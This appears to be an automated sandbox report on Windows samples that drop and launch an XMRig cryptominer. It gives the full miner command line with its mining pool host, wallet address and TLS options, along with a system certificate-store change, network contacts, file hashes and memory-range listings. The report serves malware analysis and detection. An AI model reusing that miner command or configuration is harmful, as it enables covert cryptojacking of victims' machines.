xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 105.193.132.51.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/3100-14-0x0000022345990000-0x00000223459B0000-memory.dmp

memory/3100-15-0x00000223D7D40000-0x00000223D7D60000-memory.dmp

memory/3100-16-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-18-0x00000223D83B0000-0x00000223D83D0000-memory.dmp

memory/3100-17-0x00000223D8180000-0x00000223D81A0000-memory.dmp

memory/3100-19-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-20-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-23-0x00000223D83B0000-0x00000223D83D0000-memory.dmp

memory/3100-22-0x00000223D8180000-0x00000223D81A0000-memory.dmp

memory/3100-21-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-24-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-25-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-26-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-27-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-28-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-29-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-30-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-31-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-32-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-33-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-34-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-35-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-36-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-37-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-38-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-39-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-40-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-41-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-42-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-43-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-44-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-45-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-46-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-47-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-48-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-49-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-50-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-51-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-52-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-53-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-54-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-55-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-56-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-57-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-58-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-59-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-60-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-61-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-62-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-63-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-64-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-65-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-66-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-67-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-68-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-69-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-70-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-71-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-72-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-73-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-74-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-75-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-76-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-77-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-78-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-79-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-80-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-81-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

memory/3100-82-0x00007FF72DD60000-0x00007FF72E863000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-06-14 05:12

Reported

2024-06-14 06:35

Platform

win10v2004-20240226-en

Max time kernel

1797s

Max time network

1802s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (3).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1876 --field-trial-handle=2284,i,9807419199535700662,2319175108930815708,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=2168 --field-trial-handle=2284,i,9807419199535700662,2319175108930815708,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
GB 96.16.110.114:80 tcp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
SE 192.229.221.95:80 tcp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 159.113.53.23.in-addr.arpa udp
DE 45.76.89.70:80 tcp
US 13.107.253.64:443 tcp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 57.15.31.184.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
GB 142.250.180.10:443 chromewebstore.googleapis.com tcp
US 8.8.8.8:53 10.180.250.142.in-addr.arpa udp
US 8.8.8.8:53 1.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 59.242.123.52.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 74.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 www.microsoft.com udp
BE 104.90.25.175:80 www.microsoft.com tcp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 175.25.90.104.in-addr.arpa udp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 156.33.209.4.in-addr.arpa udp
US 8.8.8.8:53 21.114.53.23.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 147.25.90.104.in-addr.arpa udp
US 8.8.8.8:53 67.32.209.4.in-addr.arpa udp
US 8.8.8.8:53 119.110.54.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 98.12.20.2.in-addr.arpa udp
US 8.8.8.8:53 35.15.31.184.in-addr.arpa udp
US 8.8.8.8:53 17.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/2120-16-0x000001F7A9570000-0x000001F7A9590000-memory.dmp

memory/2120-17-0x000001F7A96E0000-0x000001F7A9700000-memory.dmp

memory/2120-18-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-19-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-21-0x000001F7A9700000-0x000001F7A9720000-memory.dmp

memory/2120-20-0x000001F7A9720000-0x000001F7A9740000-memory.dmp

memory/2120-22-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-23-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-25-0x000001F7A9700000-0x000001F7A9720000-memory.dmp

memory/2120-24-0x000001F7A9720000-0x000001F7A9740000-memory.dmp

memory/2120-26-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-27-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-28-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-29-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-30-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-31-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-32-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-33-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-34-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-35-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-36-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-37-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-38-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-39-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-40-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-41-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-42-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-43-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-44-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-45-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-46-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-47-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-48-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-49-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-50-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-51-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-52-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-53-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-54-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-55-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-56-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-57-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-58-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-59-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-60-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-61-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-62-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-63-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-64-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-65-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-66-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-67-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-68-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-69-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-70-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-71-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-72-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-73-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-74-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-75-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-76-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-77-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-78-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-79-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-80-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-81-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-82-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-83-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

memory/2120-84-0x00007FF6DEDA0000-0x00007FF6DF8A3000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-06-14 05:12

Reported

2024-06-14 06:39

Platform

win10v2004-20240508-en

Max time kernel

1628s

Max time network

1641s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (5) - Copy.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp

Files

N/A

Analysis: behavioral9

Detonation Overview

Submitted

2024-06-14 05:12

Reported

2024-06-14 06:39

Platform

win10v2004-20240611-en

Max time kernel

1792s

Max time network

1793s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (5).exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
